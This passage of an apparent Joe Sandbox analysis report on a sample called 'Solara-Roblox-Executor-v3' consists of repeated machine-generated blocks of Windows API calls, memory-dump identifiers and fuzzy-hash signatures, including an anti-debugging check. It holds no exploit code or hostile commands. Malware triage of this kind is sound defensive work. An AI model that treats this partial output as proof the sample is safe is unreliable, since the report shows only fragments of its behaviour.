                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                          • String ID:
                                                                                          • API String ID: 2933794660-0
                                                                                          • Opcode ID: 864ef621095526b30fc542de213b2752d9ae2d4c07069c4ff95e050c019cfacc
                                                                                          • Instruction ID: 7f5d63be082fc715a90a5da0d52515c2fddb082c6a0e48f751318bcfd8494a74
                                                                                          • Opcode Fuzzy Hash: 864ef621095526b30fc542de213b2752d9ae2d4c07069c4ff95e050c019cfacc
                                                                                          • Instruction Fuzzy Hash: BCF05F75D1020DEBCB01EBB4DA899DEBBF8FF1C704B9189A5A812E6110E734AA449B51
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030AD84
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030ADCE
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030AE94
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 661929714-0
                                                                                          • Opcode ID: 871bc2807a093c7c566a695c5841a3f64ed428ab6eb6a16bd2ba876057b3e5ec
                                                                                          • Instruction ID: ca878681a9636dea124c61da3c2fc5c350a59c48d50cadc2d11a8a390ac175b3
                                                                                          • Opcode Fuzzy Hash: 871bc2807a093c7c566a695c5841a3f64ed428ab6eb6a16bd2ba876057b3e5ec
                                                                                          • Instruction Fuzzy Hash: C961BEB1552A079FDB2A9F28ECA2BBAB3A8FF04300F114179ED05CA5C5E734D990CB51
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00301B58
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00301B62
                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00301B6F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: e17ba023316ad1bfbd9090cd545fc74d6d38937efbc2f461839616b5cea3d6d7
                                                                                          • Instruction ID: 062b785c80ec023513da5949deacdb9fbe3b80da50032d628b9c569b358e5530
                                                                                          • Opcode Fuzzy Hash: e17ba023316ad1bfbd9090cd545fc74d6d38937efbc2f461839616b5cea3d6d7
                                                                                          • Instruction Fuzzy Hash: 5E31D27491122C9BCB25DF68D988BDDBBB8BF08750F5041EAE80CA7291E7709B858F44
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0030E9E9,?,?,00000008,?,?,0031539B,00000000), ref: 0030ECBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: 9e08751a18baa8bcf2309ec13c893731df5a8b01892a5b2c39ef431b13492fa9
                                                                                          • Instruction ID: ffbac1c4ff3be7085be3e17392616f4991cc0d5d0d0436d08c3b525810cde1ee
                                                                                          • Opcode Fuzzy Hash: 9e08751a18baa8bcf2309ec13c893731df5a8b01892a5b2c39ef431b13492fa9
                                                                                          • Instruction Fuzzy Hash: BAB14F31611609DFD71ACF28C496B657BE0FF45364F268A59E89ACF2E1C336E981CB40
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002F96F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-0
                                                                                          • Opcode ID: 831bfe208fe61a6ff80888683ce696458c8eaad17d54b5c6f0179c058732c46e
                                                                                          • Instruction ID: b563f04fbeca72328f2e52e807e6b25141c64b3a615420c29bd3f7367402bf01
                                                                                          • Opcode Fuzzy Hash: 831bfe208fe61a6ff80888683ce696458c8eaad17d54b5c6f0179c058732c46e
                                                                                          • Instruction Fuzzy Hash: 53A19BB19212098FDB2ACF54D8827AAFBF4FB48760F14853ED411E7261C3749985CF90
                                                                                          APIs
                                                                                            • Part of subcall function 003069F4: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,00305B8F,00000001,00000364,00000002,000000FF,?,00000000,?,002FD655,00000000,?), ref: 00306A35
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030B889
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0030B97D
                                                                                          • FindClose.KERNEL32(00000000), ref: 0030B9BC
                                                                                          • FindClose.KERNEL32(00000000), ref: 0030B9EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                          • String ID:
                                                                                          • API String ID: 2701053895-0
                                                                                          • Opcode ID: 029254f4cd31bcd3fbf7f4566ae91026b4ffd85b92d46f16196d86cc013778a3
                                                                                          • Instruction ID: 47d19c67f9ef9d8f36638e57397ed2295075540668edb5bcb1033b1445549897
                                                                                          • Opcode Fuzzy Hash: 029254f4cd31bcd3fbf7f4566ae91026b4ffd85b92d46f16196d86cc013778a3
                                                                                          • Instruction Fuzzy Hash: C951587590210CAFDF269F389CA5ABEF7ADDF89704F1441A9F41997281EB308D819F60
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030B044
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: 48ecee8148b985b0ea577fb54c497fdea0ae58ddc5f07c9167cb1b4af2cfedda
                                                                                          • Instruction ID: 1dfe57a3ceb625f0e6c8096e3863638d89a3bf594b32ec392f17138e7cee5ff9
                                                                                          • Opcode Fuzzy Hash: 48ecee8148b985b0ea577fb54c497fdea0ae58ddc5f07c9167cb1b4af2cfedda
                                                                                          • Instruction Fuzzy Hash: B021C572646106ABDB2A9A24DC62EBBB3ACEF44310F10407AFD12C61C1EB74DD44CB50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0
                                                                                          • API String ID: 0-4108050209
                                                                                          • Opcode ID: e4c4450b4a8b9eed1721212daa96d6f41bd46d3ec0c36c024503fee68894c27b
                                                                                          • Instruction ID: bc3f087d3eca54abdbaac494360f906511ba1962799535eec03745bf06063206
                                                                                          • Opcode Fuzzy Hash: e4c4450b4a8b9eed1721212daa96d6f41bd46d3ec0c36c024503fee68894c27b
                                                                                          • Instruction Fuzzy Hash: 26B1D23092060F8BCF258F688555ABEF7B2AF11380F14063DD797AB691DB71A922CB51
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0030B164
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: 4d58f61ad859aec33fc0f5ccc69253ebe2413a6c4f134e4d83277381ae51eafc
                                                                                          • Instruction ID: 9f8228e2a48faf9de02e119cb306d2584f1304e29b75cc4d5259a3da5ced33d7
                                                                                          • Opcode Fuzzy Hash: 4d58f61ad859aec33fc0f5ccc69253ebe2413a6c4f134e4d83277381ae51eafc
                                                                                          • Instruction Fuzzy Hash: 2911E972652206ABD719AB28DC62DBBB7ECEF05320B10417AF506DB181EB34ED058B90
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • EnumSystemLocalesW.KERNEL32(0030AD30,00000001,00000000,?,-00000050,?,0030AB13,00000000,-00000002,00000000,?,00000055,?), ref: 0030ACFA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 1036d039b01938b0e5aa699f4384b08aa97a19a9209e1b84bab6dc83b874ad37
                                                                                          • Instruction ID: 5eb80dc6174e224cbabfe28faa65445635426ff96b84a26be446fee3c2ffce24
                                                                                          • Opcode Fuzzy Hash: 1036d039b01938b0e5aa699f4384b08aa97a19a9209e1b84bab6dc83b874ad37
                                                                                          • Instruction Fuzzy Hash: E31129372017015FDB189F39D8B16BAB791FF80729B19842CE94687B80D7717842CB40
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0030AF4C,00000000,00000000,?), ref: 0030B2E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 3736152602-0
                                                                                          • Opcode ID: 59d52c7f5983113cd5991407241461494001ac037818722a3a56e272592c5131
                                                                                          • Instruction ID: f27be8ed7cb8b81f80e17869f9eae7e0e9fd84c275619741e544470c4683459e
                                                                                          • Opcode Fuzzy Hash: 59d52c7f5983113cd5991407241461494001ac037818722a3a56e272592c5131
                                                                                          • Instruction Fuzzy Hash: 2F01FE3A611112EBDB195B248C26AFAB758EB40754F654468EC46A71C0DB30FE41C590
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • EnumSystemLocalesW.KERNEL32(0030AFF0,00000001,?,?,-00000050,?,0030AADB,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0030AFCD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: b9c68ef3a40624e4c3e70294a31b6712b3142925c15aa263e4d6ea57481744b2
                                                                                          • Instruction ID: 23ec9a52bf8a21271febfbfdae075ca924fdd9f3fb0308f3357f8c63b50a6811
                                                                                          • Opcode Fuzzy Hash: b9c68ef3a40624e4c3e70294a31b6712b3142925c15aa263e4d6ea57481744b2
                                                                                          • Instruction Fuzzy Hash: DEF046763017055FCB265F39ECA1A7ABB91EF80368F16842CF9064B6C0C7719C02CA10
                                                                                          APIs
                                                                                            • Part of subcall function 00301D11: EnterCriticalSection.KERNEL32(?,?,00305DD8,?,0031FC38,00000008,00305CCA,00000000,00000000,?), ref: 00301D20
                                                                                          • EnumSystemLocalesW.KERNEL32(003068F0,00000001,0031FCB8,0000000C,003062F1,-00000050), ref: 00306935
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                          • String ID:
                                                                                          • API String ID: 1272433827-0
                                                                                          • Opcode ID: 2741c26a26702233379e47992b7cbe0f45a9c7683f329bf73ad87f43fdd88ee9
                                                                                          • Instruction ID: 512f36a8270ed87dbb7cac88953f9dca0844cf3a749e260561912b51f5c9e23f
                                                                                          • Opcode Fuzzy Hash: 2741c26a26702233379e47992b7cbe0f45a9c7683f329bf73ad87f43fdd88ee9
                                                                                          • Instruction Fuzzy Hash: FDF04936A00208EFD712DFA8E952BADB7F4EB08721F10812AF5209B2E1CB755955CF80
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • EnumSystemLocalesW.KERNEL32(0030B110,00000001,?,?,?,0030AB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0030B0FC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$EnumLocalesSystem
                                                                                          • String ID:
                                                                                          • API String ID: 2417226690-0
                                                                                          • Opcode ID: 34616dbfdc8fb540d2655a67be860dce9b35c2e55b81287372ff31b52167267b
                                                                                          • Instruction ID: 26a2b36cdf87adc1ac710c31cb0256528799d3efe24ac437ba909a455e1b196f
                                                                                          • Opcode Fuzzy Hash: 34616dbfdc8fb540d2655a67be860dce9b35c2e55b81287372ff31b52167267b
                                                                                          • Instruction Fuzzy Hash: F2F0E53630020957CB0A9F39DC65AABBF94EFC5761F0B4058EA098B6D0C7759842CB90
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00300A63,?,20001004,00000000,00000002,?,?,002FF971), ref: 00306429
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: 025c6cca9fd08af728ec19fcab9c9fffebc209cd3cd6b2ab4cb4e1dee9f9a461
                                                                                          • Instruction ID: f2dba6805fae48a4869294edd956679c260fedddd3cc09b2f02b2da2c2470c40
                                                                                          • Opcode Fuzzy Hash: 025c6cca9fd08af728ec19fcab9c9fffebc209cd3cd6b2ab4cb4e1dee9f9a461
                                                                                          • Instruction Fuzzy Hash: 4CE04F3250111CBBCF132F61DC16EAE7E2AEF48B50F048020FD066A1A9CB328930AA91
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 002F9A6C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: 2c7afb3b8b99802309b718f8794d9e917c829c407dd448784a4c79c5fd9d0faa
